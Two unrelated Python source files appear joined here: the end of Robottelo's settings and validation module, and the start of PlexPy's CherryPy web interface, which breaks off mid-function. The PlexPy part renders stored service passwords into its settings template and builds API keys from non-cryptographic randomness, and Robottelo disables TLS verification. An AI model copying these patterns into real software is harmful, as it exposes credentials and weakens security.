'performance', 'time_hammer', False, bool)
self.cdn_address = reader.get(
'performance', 'cdn_address')
self.virtual_machines = reader.get(
'performance', 'virtual_machines', cast=list)
self.fresh_install_savepoint = reader.get(
'performance', 'fresh_install_savepoint')
self.enabled_repos_savepoint = reader.get(
'performance', 'enabled_repos_savepoint')
self.csv_buckets_count = reader.get(
'performance', 'csv_buckets_count', 10, int)
self.sync_count = reader.get(
'performance', 'sync_count', 3, int)
self.sync_type = reader.get(
'performance', 'sync_type', 'sync')
self.repos = reader.get(
'performance', 'repos', cast=list)
def validate(self):
"""Validate performance settings."""
validation_errors = []
if self.cdn_address is None:
validation_errors.append(
'[performance] cdn_address must be provided.')
if self.virtual_machines is None:
validation_errors.append(
'[performance] virtual_machines must be provided.')
if self.fresh_install_savepoint is None:
validation_errors.append(
'[performance] fresh_install_savepoint must be provided.')
if self.enabled_repos_savepoint is None:
validation_errors.append(
'[performance] enabled_repos_savepoint must be provided.')
return validation_errors
class RHAISettings(FeatureSettings):
"""RHAI settings definitions."""
def __init__(self, *args, **kwargs):
super(RHAISettings, self).__init__(*args, **kwargs)
self.insights_client_el6repo = None
self.insights_client_el7repo = None
def read(self, reader):
"""Read RHAI settings."""
self.insights_client_el6repo = reader.get(
'rhai', 'insights_client_el6repo')
self.insights_client_el7repo = reader.get(
'rhai', 'insights_client_el7repo')
def validate(self):
"""Validate RHAI settings."""
return []
class TransitionSettings(FeatureSettings):
"""Transition settings definitions."""
def __init__(self, *args, **kwargs):
super(TransitionSettings, self).__init__(*args, **kwargs)
self.exported_data = None
def read(self, reader):
"""Read transition settings."""
self.exported_data = reader.get('transition', 'exported_data')
def validate(self):
"""Validate transition settings."""
validation_errors = []
if self.exported_data is None:
validation_errors.append(
'[transition] exported_data must be provided.')
return validation_errors
class VlanNetworkSettings(FeatureSettings):
"""Vlan Network settings definitions."""
def __init__(self, *args, **kwargs):
super(VlanNetworkSettings, self).__init__(*args, **kwargs)
self.subnet = None
self.netmask = None
self.gateway = None
self.bridge = None
def read(self, reader):
"""Read Vlan Network settings."""
self.subnet = reader.get('vlan_networking', 'subnet')
self.netmask = reader.get('vlan_networking', 'netmask')
self.gateway = reader.get('vlan_networking', 'gateway')
self.bridge = reader.get('vlan_networking', 'bridge')
def validate(self):
"""Validate Vlan Network settings."""
validation_errors = []
if not all(vars(self).values()):
validation_errors.append(
'All [vlan_networking] subnet, netmask, gateway, bridge '
'options must be provided.')
return validation_errors
class UpgradeSettings(FeatureSettings):
"""Satellite upgrade settings definitions."""
def __init__(self, *args, **kwargs):
super(UpgradeSettings, self).__init__(*args, **kwargs)
self.upgrade_data = None
def read(self, reader):
"""Read and validate Satellite server settings."""
self.upgrade_data = reader.get('upgrade', 'upgrade_data')
def validate(self):
validation_errors = []
if self.upgrade_data is None:
validation_errors.append('[upgrade] data must be provided.')
return validation_errors
class Settings(object):
"""Robottelo's settings representation."""
def __init__(self):
self._all_features = None
self._configured = False
self._validation_errors = []
self.browser = None
self.locale = None
self.project = None
self.reader = None
self.rhel6_repo = None
self.rhel7_repo = None
self.screenshots_path = None
self.saucelabs_key = None
self.saucelabs_user = None
self.server = ServerSettings()
self.run_one_datapoint = None
self.upstream = None
self.verbosity = None
self.webdriver = None
self.webdriver_binary = None
self.webdriver_desired_capabilities = None
# Features
self.clients = ClientsSettings()
self.compute_resources = LibvirtHostSettings()
self.discovery = DiscoveryISOSettings()
self.docker = DockerSettings()
self.fake_capsules = FakeCapsuleSettings()
self.fake_manifest = FakeManifestSettings()
self.ldap = LDAPSettings()
self.oscap = OscapSettings()
self.performance = PerformanceSettings()
self.rhai = RHAISettings()
self.rhev = RHEVSettings()
self.transition = TransitionSettings()
self.vlan_networking = VlanNetworkSettings()
self.upgrade = UpgradeSettings()
self.vmware = VmWareSettings()
def configure(self):
"""Read the settings file and parse the configuration.
:raises: ImproperlyConfigured if any issue is found during the parsing
or validation of the configuration.
"""
if self.configured:
# TODO: what to do here, raise and exception, just skip or ...?
return
# Expect the settings file to be on the robottelo project root.
settings_path = os.path.join(get_project_root(), SETTINGS_FILE_NAME)
if not os.path.isfile(settings_path):
raise ImproperlyConfigured(
'Not able to find settings file at {}'.format(settings_path))
self.reader = INIReader(settings_path)
self._read_robottelo_settings()
self._validation_errors.extend(
self._validate_robottelo_settings())
self.server.read(self.reader)
self._validation_errors.extend(self.server.validate())
if self.reader.has_section('clients'):
self.clients.read(self.reader)
self._validation_errors.extend(self.clients.validate())
if self.reader.has_section('compute_resources'):
self.compute_resources.read(self.reader)
self._validation_errors.extend(self.compute_resources.validate())
if self.reader.has_section('discovery'):
self.discovery.read(self.reader)
self._validation_errors.extend(self.discovery.validate())
if self.reader.has_section('docker'):
self.docker.read(self.reader)
self._validation_errors.extend(self.docker.validate())
if self.reader.has_section('fake_capsules'):
self.fake_capsules.read(self.reader)
self._validation_errors.extend(self.fake_capsules.validate())
if self.reader.has_section('fake_manifest'):
self.fake_manifest.read(self.reader)
self._validation_errors.extend(self.fake_manifest.validate())
if self.reader.has_section('ldap'):
self.ldap.read(self.reader)
self._validation_errors.extend(self.ldap.validate())
if self.reader.has_section('oscap'):
self.oscap.read(self.reader)
self._validation_errors.extend(self.oscap.validate())
if self.reader.has_section('performance'):
self.performance.read(self.reader)
self._validation_errors.extend(self.performance.validate())
if self.reader.has_section('rhai'):
self.rhai.read(self.reader)
self._validation_errors.extend(self.rhai.validate())
if self.reader.has_section('rhev'):
self.rhev.read(self.reader)
self._validation_errors.extend(self.rhev.validate())
if self.reader.has_section('transition'):
self.transition.read(self.reader)
self._validation_errors.extend(self.transition.validate())
if self.reader.has_section('vlan_networking'):
self.vlan_networking.read(self.reader)
self._validation_errors.extend(self.vlan_networking.validate())
if self.reader.has_section('upgrade'):
self.upgrade.read(self.reader)
self._validation_errors.extend(self.upgrade.validate())
if self.reader.has_section('vmware'):
self.vmware.read(self.reader)
self._validation_errors.extend(self.vmware.validate())
if self._validation_errors:
raise ImproperlyConfigured(
'Failed to validate the configuration, check the message(s):\n'
'{}'.format('\n'.join(self._validation_errors))
)
self._configure_logging()
self._configure_third_party_logging()
self._configure_entities()
self._configured = True
def _read_robottelo_settings(self):
"""Read Robottelo's general settings."""
self.log_driver_commands = self.reader.get(
'robottelo',
'log_driver_commands',
['newSession',
'windowMaximize',
'get',
'findElement',
'sendKeysToElement',
'clickElement',
'mouseMoveTo'],
list
)
self.browser = self.reader.get(
'robottelo', 'browser', 'selenium')
self.locale = self.reader.get('robottelo', 'locale', 'en_US.UTF-8')
self.project = self.reader.get('robottelo', 'project', 'sat')
self.rhel6_repo = self.reader.get('robottelo', 'rhel6_repo', None)
self.rhel7_repo = self.reader.get('robottelo', 'rhel7_repo', None)
self.screenshots_path = self.reader.get(
'robottelo', 'screenshots_path', '/tmp/robottelo/screenshots')
self.run_one_datapoint = self.reader.get(
'robottelo', 'run_one_datapoint', False, bool)
self.cleanup = self.reader.get('robottelo', 'cleanup', False, bool)
self.upstream = self.reader.get('robottelo', 'upstream', True, bool)
self.verbosity = self.reader.get(
'robottelo',
'verbosity',
INIReader.cast_logging_level('debug'),
INIReader.cast_logging_level
)
self.webdriver = self.reader.get(
'robottelo', 'webdriver', 'firefox')
self.saucelabs_user = self.reader.get(
'robottelo', 'saucelabs_user', None)
self.saucelabs_key = self.reader.get(
'robottelo', 'saucelabs_key', None)
self.webdriver_binary = self.reader.get(
'robottelo', 'webdriver_binary', None)
self.webdriver_desired_capabilities = self.reader.get(
'robottelo',
'webdriver_desired_capabilities',
None,
cast=INIReader.cast_webdriver_desired_capabilities
)
self.window_manager_command = self.reader.get(
'robottelo', 'window_manager_command', None)
def _validate_robottelo_settings(self):
"""Validate Robottelo's general settings."""
validation_errors = []
browsers = ('selenium', 'docker', 'saucelabs')
webdrivers = ('chrome', 'firefox', 'ie', 'phantomjs', 'remote')
if self.browser not in browsers:
validation_errors.append(
'[robottelo] browser should be one of {0}.'
.format(', '.join(browsers))
)
if self.webdriver not in webdrivers:
validation_errors.append(
'[robottelo] webdriver should be one of {0}.'
.format(', '.join(webdrivers))
)
if self.browser == 'saucelabs':
if self.saucelabs_user is None:
validation_errors.append(
'[robottelo] saucelabs_user must be provided when '
'browser is saucelabs.'
)
if self.saucelabs_key is None:
validation_errors.append(
'[robottelo] saucelabs_key must be provided when '
'browser is saucelabs.'
)
return validation_errors
@property
def configured(self):
"""Returns True if the settings have already been configured."""
return self._configured
@property
def all_features(self):
"""List all expected feature settings sections."""
if self._all_features is None:
self._all_features = [
name for name, value in vars(self).items()
if isinstance(value, FeatureSettings)
]
return self._all_features
def _configure_entities(self):
"""Configure NailGun's entity classes.
Do the following:
* Set ``entity_mixins.CREATE_MISSING`` to ``True``. This causes method
``EntityCreateMixin.create_raw`` to generate values for empty and
required fields.
* Set ``nailgun.entity_mixins.DEFAULT_SERVER_CONFIG`` to whatever is
returned by :meth:`robottelo.helpers.get_nailgun_config`. See
``robottelo.entity_mixins.Entity`` for more information on the effects
of this.
* Set a default value for ``nailgun.entities.GPGKey.content``.
* Set the default value for
``nailgun.entities.DockerComputeResource.url``
if either ``docker.internal_url`` or ``docker.external_url`` is set in
the configuration file.
"""
entity_mixins.CREATE_MISSING = True
entity_mixins.DEFAULT_SERVER_CONFIG = ServerConfig(
self.server.get_url(),
self.server.get_credentials(),
verify=False,
)
gpgkey_init = entities.GPGKey.__init__
def patched_gpgkey_init(self, server_config=None, **kwargs):
"""Set a default value on the ``content`` field."""
gpgkey_init(self, server_config, **kwargs)
self._fields['content'].default = os.path.join(
get_project_root(),
'tests', 'foreman', 'data', 'valid_gpg_key.txt'
)
entities.GPGKey.__init__ = patched_gpgkey_init
# NailGun provides a default value for ComputeResource.url. We override
# that value if `docker.internal_url` or `docker.external_url` is set.
docker_url = None
# Try getting internal url
docker_url = self.docker.get_unix_socket_url()
# Try getting external url
if docker_url is None:
docker_url = self.docker.external_url
if docker_url is not None:
dockercr_init = entities.DockerComputeResource.__init__
def patched_dockercr_init(self, server_config=None, **kwargs):
"""Set a default value on the ``docker_url`` field."""
dockercr_init(self, server_config, **kwargs)
self._fields['url'].default = docker_url
entities.DockerComputeResource.__init__ = patched_dockercr_init
def _configure_logging(self):
"""Configure logging for the entire framework.
If a config named ``logging.conf`` exists in Robottelo's root
directory, the logger is configured using the options in that file.
Otherwise, a custom logging output format is set, and default values
are used for all other logging options.
"""
# All output should be made by the logging module, including warnings
logging.captureWarnings(True)
# Set the logging level based on the Robottelo's verbosity
for name in ('nailgun', 'robottelo'):
logging.getLogger(name).setLevel(self.verbosity)
# Allow overriding logging config based on the presence of logging.conf
# file on Robottelo's project root
logging_conf_path = os.path.join(get_project_root(), 'logging.conf')
if os.path.isfile(logging_conf_path):
config.fileConfig(logging_conf_path)
else:
logging.basicConfig(
format='%(levelname)s %(module)s:%(lineno)d: %(message)s'
)
def _configure_third_party_logging(self):
"""Increase the level of third party packages logging."""
loggers = (
'bugzilla',
'easyprocess',
'paramiko',
'requests.packages.urllib3.connectionpool',
'selenium.webdriver.remote.remote_connection',
)
for logger in loggers:
logging.getLogger(logger).setLevel(logging.WARNING)
|
# This file is part of PlexPy.
from plexpy import logger, notifiers, plextv, pmsconnect, common, log_reader, datafactory, graphs, users
from plexpy.helpers import checked, radio
from mako.lookup import TemplateLookup
from mako import exceptions
import plexpy
import threading
import cherrypy
import hashlib
import random
import json
import os
try:
# pylint:disable=E0611
# ignore this error because we are catching the ImportError
from collections import OrderedDict
# pylint:enable=E0611
except ImportError:
# Python 2.6.x fallback, from libs
from ordereddict import OrderedDict
def serve_template(templatename, **kwargs):
interface_dir = os.path.join(str(plexpy.PROG_DIR), 'data/interfaces/')
template_dir = os.path.join(str(interface_dir), plexpy.CONFIG.INTERFACE)
_hplookup = TemplateLookup(directories=[template_dir])
try:
template = _hplookup.get_template(templatename)
return template.render(**kwargs)
except:
return exceptions.html_error_template().render()
class WebInterface(object):
def __init__(self):
self.interface_dir = os.path.join(str(plexpy.PROG_DIR), 'data/')
@cherrypy.expose
def index(self):
if plexpy.CONFIG.FIRST_RUN_COMPLETE:
raise cherrypy.HTTPRedirect("home")
else:
raise cherrypy.HTTPRedirect("welcome")
@cherrypy.expose
def home(self):
config = {
"home_stats_length": plexpy.CONFIG.HOME_STATS_LENGTH,
"home_stats_type": plexpy.CONFIG.HOME_STATS_TYPE,
"home_stats_count": plexpy.CONFIG.HOME_STATS_COUNT,
"pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER,
}
return serve_template(templatename="index.html", title="Home", config=config)
@cherrypy.expose
def welcome(self, **kwargs):
config = {
"launch_browser": checked(plexpy.CONFIG.LAUNCH_BROWSER),
"refresh_users_on_startup": checked(plexpy.CONFIG.REFRESH_USERS_ON_STARTUP),
"pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER,
"pms_ip": plexpy.CONFIG.PMS_IP,
"pms_is_remote": checked(plexpy.CONFIG.PMS_IS_REMOTE),
"pms_port": plexpy.CONFIG.PMS_PORT,
"pms_token": plexpy.CONFIG.PMS_TOKEN,
"pms_ssl": checked(plexpy.CONFIG.PMS_SSL),
"pms_uuid": plexpy.CONFIG.PMS_UUID,
"tv_notify_enable": checked(plexpy.CONFIG.TV_NOTIFY_ENABLE),
"movie_notify_enable": checked(plexpy.CONFIG.MOVIE_NOTIFY_ENABLE),
"music_notify_enable": checked(plexpy.CONFIG.MUSIC_NOTIFY_ENABLE),
"tv_notify_on_start": checked(plexpy.CONFIG.TV_NOTIFY_ON_START),
"movie_notify_on_start": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_START),
"music_notify_on_start": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_START),
"video_logging_enable": checked(plexpy.CONFIG.VIDEO_LOGGING_ENABLE),
"music_logging_enable": checked(plexpy.CONFIG.MUSIC_LOGGING_ENABLE),
"logging_ignore_interval": plexpy.CONFIG.LOGGING_IGNORE_INTERVAL,
"check_github": checked(plexpy.CONFIG.CHECK_GITHUB)
}
# The setup wizard just refreshes the page on submit so we must redirect to home if config set.
# Also redirecting to home if a PMS token already exists - will remove this in future.
if plexpy.CONFIG.FIRST_RUN_COMPLETE or plexpy.CONFIG.PMS_TOKEN:
raise cherrypy.HTTPRedirect("home")
else:
return serve_template(templatename="welcome.html", title="Welcome", config=config)
@cherrypy.expose
def get_date_formats(self):
if plexpy.CONFIG.DATE_FORMAT:
date_format = plexpy.CONFIG.DATE_FORMAT
else:
date_format = 'YYYY-MM-DD'
if plexpy.CONFIG.TIME_FORMAT:
time_format = plexpy.CONFIG.TIME_FORMAT
else:
time_format = 'HH:mm'
formats = {'date_format': date_format,
'time_format': time_format}
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(formats)
@cherrypy.expose
def home_stats(self, time_range='30', stat_type='0', stat_count='5', **kwargs):
data_factory = datafactory.DataFactory()
stats_data = data_factory.get_home_stats(time_range=time_range, stat_type=stat_type, stat_count=stat_count)
return serve_template(templatename="home_stats.html", title="Stats", data=stats_data)
@cherrypy.expose
def library_stats(self, **kwargs):
pms_connect = pmsconnect.PmsConnect()
stats_data = pms_connect.get_library_stats()
return serve_template(templatename="library_stats.html", title="Library Stats", data=stats_data)
@cherrypy.expose
def history(self):
return serve_template(templatename="history.html", title="History")
@cherrypy.expose
def users(self):
return serve_template(templatename="users.html", title="Users")
@cherrypy.expose
def graphs(self):
return serve_template(templatename="graphs.html", title="Graphs")
@cherrypy.expose
def sync(self):
return serve_template(templatename="sync.html", title="Synced Items")
@cherrypy.expose
def user(self, user=None, user_id=None):
user_data = users.Users()
if user_id:
try:
user_details = user_data.get_user_details(user_id=user_id)
except:
logger.warn("Unable to retrieve friendly name for user_id %s " % user_id)
elif user:
try:
user_details = user_data.get_user_details(user=user)
except:
logger.warn("Unable to retrieve friendly name for user %s " % user)
else:
logger.debug(u"User page requested but no parameters received.")
raise cherrypy.HTTPRedirect("home")
return serve_template(templatename="user.html", title="User", data=user_details)
@cherrypy.expose
def edit_user_dialog(self, user=None, user_id=None, **kwargs):
user_data = users.Users()
if user_id:
result = user_data.get_user_friendly_name(user_id=user_id)
status_message = ''
elif user:
result = user_data.get_user_friendly_name(user=user)
status_message = ''
else:
result = None
status_message = 'An error occured.'
return serve_template(templatename="edit_user.html", title="Edit User", data=result, status_message=status_message)
@cherrypy.expose
def edit_user(self, user=None, user_id=None, friendly_name=None, **kwargs):
if 'do_notify' in kwargs:
do_notify = kwargs.get('do_notify')
else:
do_notify = 0
if 'keep_history' in kwargs:
keep_history = kwargs.get('keep_history')
else:
keep_history = 0
if 'thumb' in kwargs:
custom_avatar = kwargs['thumb']
else:
custom_avatar = ''
user_data = users.Users()
if user_id:
try:
user_data.set_user_friendly_name(user_id=user_id,
friendly_name=friendly_name,
do_notify=do_notify,
keep_history=keep_history)
user_data.set_user_profile_url(user_id=user_id,
profile_url=custom_avatar)
status_message = "Successfully updated user."
return status_message
except:
status_message = "Failed to update user."
return status_message
if user:
try:
user_data.set_user_friendly_name(user=user,
friendly_name=friendly_name,
do_notify=do_notify,
keep_history=keep_history)
user_data.set_user_profile_url(user=user,
profile_url=custom_avatar)
status_message = "Successfully updated user."
return status_message
except:
status_message = "Failed to update user."
return status_message
@cherrypy.expose
def get_stream_data(self, row_id=None, user=None, **kwargs):
data_factory = datafactory.DataFactory()
stream_data = data_factory.get_stream_details(row_id)
return serve_template(templatename="stream_data.html", title="Stream Data", data=stream_data, user=user)
@cherrypy.expose
def get_ip_address_details(self, ip_address=None, **kwargs):
import socket
try:
socket.inet_aton(ip_address)
except socket.error:
ip_address = None
return serve_template(templatename="ip_address_modal.html", title="IP Address Details", data=ip_address)
@cherrypy.expose
def get_user_list(self, **kwargs):
user_data = users.Users()
user_list = user_data.get_user_list(kwargs=kwargs)
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(user_list)
@cherrypy.expose
def checkGithub(self):
from plexpy import versioncheck
versioncheck.checkGithub()
raise cherrypy.HTTPRedirect("home")
@cherrypy.expose
def logs(self):
return serve_template(templatename="logs.html", title="Log", lineList=plexpy.LOG_LIST)
@cherrypy.expose
def clearLogs(self):
plexpy.LOG_LIST = []
logger.info("Web logs cleared")
raise cherrypy.HTTPRedirect("logs")
@cherrypy.expose
def toggleVerbose(self):
plexpy.VERBOSE = not plexpy.VERBOSE
logger.initLogger(console=not plexpy.QUIET,
log_dir=plexpy.CONFIG.LOG_DIR, verbose=plexpy.VERBOSE)
logger.info("Verbose toggled, set to %s", plexpy.VERBOSE)
logger.debug("If you read this message, debug logging is available")
raise cherrypy.HTTPRedirect("logs")
@cherrypy.expose
def getLog(self, start=0, length=100, **kwargs):
start = int(start)
length = int(length)
search_value = ""
search_regex = ""
order_column = 0
order_dir = "desc"
if 'order[0][dir]' in kwargs:
order_dir = kwargs.get('order[0][dir]', "desc")
if 'order[0][column]' in kwargs:
order_column = kwargs.get('order[0][column]', "0")
if 'search[value]' in kwargs:
search_value = kwargs.get('search[value]', "")
if 'search[regex]' in kwargs:
search_regex = kwargs.get('search[regex]', "")
filtered = []
if search_value == "":
filtered = plexpy.LOG_LIST[::]
else:
filtered = [row for row in plexpy.LOG_LIST for column in row if search_value.lower() in column.lower()]
sortcolumn = 0
if order_column == '1':
sortcolumn = 2
elif order_column == '2':
sortcolumn = 1
filtered.sort(key=lambda x: x[sortcolumn], reverse=order_dir == "desc")
rows = filtered[start:(start + length)]
rows = [[row[0], row[2], row[1]] for row in rows]
return json.dumps({
'recordsFiltered': len(filtered),
'recordsTotal': len(plexpy.LOG_LIST),
'data': rows,
})
@cherrypy.expose
def get_plex_log(self, window=1000, **kwargs):
log_lines = []
try:
log_lines = {'data': log_reader.get_log_tail(window=window)}
except:
logger.warn("Unable to retrieve Plex Logs.")
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(log_lines)
@cherrypy.expose
def generateAPI(self):
apikey = hashlib.sha224(str(random.getrandbits(256))).hexdigest()[0:32]
logger.info("New API generated")
return apikey
@cherrypy.expose
def settings(self):
interface_dir = os.path.join(plexpy.PROG_DIR, 'data/interfaces/')
interface_list = [name for name in os.listdir(interface_dir) if
os.path.isdir(os.path.join(interface_dir, name))]
# Initialise blank passwords so we do not expose them in the html forms
# but users are still able to clear them
if plexpy.CONFIG.HTTP_PASSWORD != '':
http_password = ' '
else:
http_password = ''
config = {
"http_host": plexpy.CONFIG.HTTP_HOST,
"http_username": plexpy.CONFIG.HTTP_USERNAME,
"http_port": plexpy.CONFIG.HTTP_PORT,
"http_password": http_password,
"launch_browser": checked(plexpy.CONFIG.LAUNCH_BROWSER),
"enable_https": checked(plexpy.CONFIG.ENABLE_HTTPS),
"https_cert": plexpy.CONFIG.HTTPS_CERT,
"https_key": plexpy.CONFIG.HTTPS_KEY,
"api_enabled": checked(plexpy.CONFIG.API_ENABLED),
"api_key": plexpy.CONFIG.API_KEY,
"update_db_interval": plexpy.CONFIG.UPDATE_DB_INTERVAL,
"freeze_db": checked(plexpy.CONFIG.FREEZE_DB),
"log_dir": plexpy.CONFIG.LOG_DIR,
"cache_dir": plexpy.CONFIG.CACHE_DIR,
"check_github": checked(plexpy.CONFIG.CHECK_GITHUB),
"interface_list": interface_list,
"growl_enabled": checked(plexpy.CONFIG.GROWL_ENABLED),
"growl_host": plexpy.CONFIG.GROWL_HOST,
"growl_password": plexpy.CONFIG.GROWL_PASSWORD,
"prowl_enabled": checked(plexpy.CONFIG.PROWL_ENABLED),
"prowl_keys": plexpy.CONFIG.PROWL_KEYS,
"prowl_priority": plexpy.CONFIG.PROWL_PRIORITY,
"xbmc_enabled": checked(plexpy.CONFIG.XBMC_ENABLED),
"xbmc_host": plexpy.CONFIG.XBMC_HOST,
"xbmc_username": plexpy.CONFIG.XBMC_USERNAME,
"xbmc_password": plexpy.CONFIG.XBMC_PASSWORD,
"plex_enabled": checked(plexpy.CONFIG.PLEX_ENABLED),
"plex_client_host": plexpy.CONFIG.PLEX_CLIENT_HOST,
"plex_username": plexpy.CONFIG.PLEX_USERNAME,
"plex_password": plexpy.CONFIG.PLEX_PASSWORD,
"nma_enabled": checked(plexpy.CONFIG.NMA_ENABLED),
"nma_apikey": plexpy.CONFIG.NMA_APIKEY,
"nma_priority": int(plexpy.CONFIG.NMA_PRIORITY),
"pushalot_enabled": checked(plexpy.CONFIG.PUSHALOT_ENABLED),
"pushalot_apikey": plexpy.CONFIG.PUSHALOT_APIKEY,
"pushover_enabled": checked(plexpy.CONFIG.PUSHOVER_ENABLED),
"pushover_keys": plexpy.CONFIG.PUSHOVER_KEYS,
"pushover_apitoken": plexpy.CONFIG.PUSHOVER_APITOKEN,
"pushover_priority": plexpy.CONFIG.PUSHOVER_PRIORITY,
"pushbullet_enabled": checked(plexpy.CONFIG.PUSHBULLET_ENABLED),
"pushbullet_apikey": plexpy.CONFIG.PUSHBULLET_APIKEY,
"pushbullet_deviceid": plexpy.CONFIG.PUSHBULLET_DEVICEID,
"twitter_enabled": checked(plexpy.CONFIG.TWITTER_ENABLED),
"osx_notify_enabled": checked(plexpy.CONFIG.OSX_NOTIFY_ENABLED),
"osx_notify_app": plexpy.CONFIG.OSX_NOTIFY_APP,
"boxcar_enabled": checked(plexpy.CONFIG.BOXCAR_ENABLED),
"boxcar_token": plexpy.CONFIG.BOXCAR_TOKEN,
"cache_sizemb": plexpy.CONFIG.CACHE_SIZEMB,
"email_enabled": checked(plexpy.CONFIG.EMAIL_ENABLED),
"email_from": plexpy.CONFIG.EMAIL_FROM,
"email_to": plexpy.CONFIG.EMAIL_TO,
"email_smtp_server": plexpy.CONFIG.EMAIL_SMTP_SERVER,
"email_smtp_user": plexpy.CONFIG.EMAIL_SMTP_USER,
"email_smtp_password": plexpy.CONFIG.EMAIL_SMTP_PASSWORD,
"email_smtp_port": int(plexpy.CONFIG.EMAIL_SMTP_PORT),
"email_tls": checked(plexpy.CONFIG.EMAIL_TLS),
"pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER,
"pms_ip": plexpy.CONFIG.PMS_IP,
"pms_logs_folder": plexpy.CONFIG.PMS_LOGS_FOLDER,
"pms_port": plexpy.CONFIG.PMS_PORT,
"pms_token": plexpy.CONFIG.PMS_TOKEN,
"pms_ssl": checked(plexpy.CONFIG.PMS_SSL),
"pms_use_bif": checked(plexpy.CONFIG.PMS_USE_BIF),
"pms_uuid": plexpy.CONFIG.PMS_UUID,
"plexwatch_database": plexpy.CONFIG.PLEXWATCH_DATABASE,
"date_format": plexpy.CONFIG.DATE_FORMAT,
"time_format": plexpy.CONFIG.TIME_FORMAT,
"grouping_global_history": checked(plexpy.CONFIG.GROUPING_GLOBAL_HISTORY),
"grouping_user_history": checked(plexpy.CONFIG.GROUPING_USER_HISTORY),
"grouping_charts": checked(plexpy.CONFIG.GROUPING_CHARTS),
"tv_notify_enable": checked(plexpy.CONFIG.TV_NOTIFY_ENABLE),
"movie_notify_enable": checked(plexpy.CONFIG.MOVIE_NOTIFY_ENABLE),
"music_notify_enable": checked(plexpy.CONFIG.MUSIC_NOTIFY_ENABLE),
"tv_notify_on_start": checked(plexpy.CONFIG.TV_NOTIFY_ON_START),
"movie_notify_on_start": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_START),
"music_notify_on_start": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_START),
"tv_notify_on_stop": checked(plexpy.CONFIG.TV_NOTIFY_ON_STOP),
"movie_notify_on_stop": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_STOP),
"music_notify_on_stop": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_STOP),
"tv_notify_on_pause": checked(plexpy.CONFIG.TV_NOTIFY_ON_PAUSE),
"movie_notify_on_pause": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_PAUSE),
"music_notify_on_pause": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_PAUSE),
"monitoring_interval": plexpy.CONFIG.MONITORING_INTERVAL,
"refresh_users_interval": plexpy.CONFIG.REFRESH_USERS_INTERVAL,
"refresh_users_on_startup": checked(plexpy.CONFIG.REFRESH_USERS_ON_STARTUP),
"ip_logging_enable": checked(plexpy.CONFIG.IP_LOGGING_ENABLE),
"video_logging_enable": checked(plexpy.CONFIG.VIDEO_LOGGING_ENABLE),
"music_logging_enable": checked(plexpy.CONFIG.MUSIC_LOGGING_ENABLE),
"logging_ignore_interval": plexpy.CONFIG.LOGGING_IGNORE_INTERVAL,
"pms_is_remote": checked(plexpy.CONFIG.PMS_IS_REMOTE),
"notify_watched_percent": plexpy.CONFIG.NOTIFY_WATCHED_PERCENT,
"notify_on_start_subject_text": plexpy.CONFIG.NOTIFY_ON_START_SUBJECT_TEXT,
"notify_on_start_body_text": plexpy.CONFIG.NOTIFY_ON_START_BODY_TEXT,
"notify_on_stop_subject_text": plexpy.CONFIG.NOTIFY_ON_STOP_SUBJECT_TEXT,
"notify_on_stop_body_text": plexpy.CONFIG.NOTIFY_ON_STOP_BODY_TEXT,
"notify_on_pause_subject_text": plexpy.CONFIG.NOTIFY_ON_PAUSE_SUBJECT_TEXT,
"notify_on_pause_body_text": plexpy.CONFIG.NOTIFY_ON_PAUSE_BODY_TEXT,
"notify_on_resume_subject_text": plexpy.CONFIG.NOTIFY_ON_RESUME_SUBJECT_TEXT,
"notify_on_resume_body_text": plexpy.CONFIG.NOTIFY_ON_RESUME_BODY_TEXT,
"notify_on_buffer_subject_text": plexpy.CONFIG.NOTIFY_ON_BUFFER_SUBJECT_TEXT,
"notify_on_buffer_body_text": plexpy.CONFIG.NOTIFY_ON_BUFFER_BODY_TEXT,
"notify_on_watched_subject_text": plexpy.CONFIG.NOTIFY_ON_WATCHED_SUBJECT_TEXT,
"notify_on_watched_body_text": plexpy.CONFIG.NOTIFY_ON_WATCHED_BODY_TEXT,
"home_stats_length": plexpy.CONFIG.HOME_STATS_LENGTH,
"home_stats_type": checked(plexpy.CONFIG.HOME_STATS_TYPE),
"home_stats_count": plexpy.CONFIG.HOME_STATS_COUNT,
"buffer_threshold": plexpy.CONFIG.BUFFER_THRESHOLD,
"buffer_wait": plexpy.CONFIG.BUFFER_WAIT
}
return serve_template(templatename="settings.html", title="Settings", config=config)
@cherrypy.expose
def configUpdate(self, **kwargs):
# Handle the variable config options. Note - keys with False values aren't getting passed
checked_configs = [
"launch_browser", "enable_https", "api_enabled", "freeze_db", "growl_enabled",
"prowl_enabled", "xbmc_enabled", "check_github",
"plex_enabled", "nma_enabled", "pushalot_enabled",
"pushover_enabled", "pushbullet_enabled",
"twitter_enabled", "osx_notify_enabled",
"boxcar_enabled", "email_enabled", "email_tls",
"grouping_global_history", "grouping_user_history", "grouping_charts", "pms_use_bif", "pms_ssl",
"tv_notify_enable", "movie_notify_enable", "music_notify_enable",
"tv_notify_on_start", "movie_notify_on_start", "music_notify_on_start",
"tv_notify_on_stop", "movie_notify_on_stop", "music_notify_on_stop",
"tv_notify_on_pause", "movie_notify_on_pause", "music_notify_on_pause", "refresh_users_on_startup",
"ip_logging_enable", "video_logging_enable", "music_logging_enable", "pms_is_remote", "home_stats_type"
]
for checked_config in checked_configs:
if checked_config not in kwargs:
# checked items should be zero or one. if they were not sent then the item was not checked
kwargs[checked_config] = 0
# If http password exists in config, do not overwrite when blank value received
if 'http_password' in kwargs:
if kwargs['http_password'] == ' ' and plexpy.CONFIG.HTTP_PASSWORD != '':
kwargs['http_password'] = plexpy.CONFIG.HTTP_PASSWORD
for plain_config, use_config in [(x[4:], x) for x in kwargs if x.startswith('use_')]:
# the use prefix is fairly nice in the html, but does not match the actual config
kwargs[plain_config] = kwargs[use_config]
del kwargs[use_config]
# Check if we should refresh our data
refresh_users = False
reschedule = False
if 'monitoring_interval' in kwargs and 'refresh_users_interval' in kwargs:
